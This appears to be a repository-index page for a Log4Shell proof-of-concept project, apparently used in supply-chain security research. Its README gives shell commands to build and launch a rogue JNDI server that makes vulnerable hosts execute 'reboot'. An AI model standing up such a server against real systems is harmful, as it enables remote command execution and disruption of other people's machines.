https://github.com/chains-project/log4shell-poc
https://github.com/chains-project/log4shell-poc
Last synced: about 1 year ago
JSON representation
- Host: GitHub
- URL: https://github.com/chains-project/log4shell-poc
- Owner: chains-project
- Created: 2024-03-11T13:27:03.000Z (over 2 years ago)
- Default Branch: main
- Last Pushed: 2024-03-20T08:33:32.000Z (about 2 years ago)
- Last Synced: 2024-03-20T09:42:58.615Z (about 2 years ago)
- Language: Java
- Size: 2.73 MB
- Stars: 0
- Watchers: 6
- Forks: 0
- Open Issues: 3
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# log4shell-poc
MOVED HERE - https://github.com/chains-project/exploits-for-sbom.exe
## How we are different
1. We provide a custom payload
2. Found no other documentation of it only working for specific Java 11
## To start JNDI server
```shell
cd rogue-jndi
mvn clean package -DskipTests
java -jar target/RogueJndi-1.1.jar --command reboot
```